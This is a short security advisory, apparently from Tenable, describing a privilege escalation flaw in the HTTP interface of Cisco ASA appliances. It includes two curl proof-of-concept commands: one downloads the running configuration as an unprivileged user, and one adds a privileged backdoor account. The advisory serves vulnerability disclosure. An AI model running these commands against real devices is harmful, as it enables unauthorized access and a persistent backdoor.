### Synopsis
While examining a Cisco Adaptive Security Appliance, Tenable discovered a privilege escalation vulnerability in the HTTP interface. When command authorization is not enabled, an authenticated remote unprivileged (level 0 or 1) user can change or download files as well as upload or replace software images on the appliance.
A simple proof of concept for downloading the running configuration follows:
```
curl --basic -u notadmin -p -k http://[ip]/admin/system/running-config
```
The following proof of concept allows an unprivileged user to add a new privileged user to the running configuration:
```
curl --basic -u notadmin -p -k -X “POST” --data-binary “username fourthuser password backdoor privilege 15” “http://[ip]/admin/config”
```
Unavailable Comments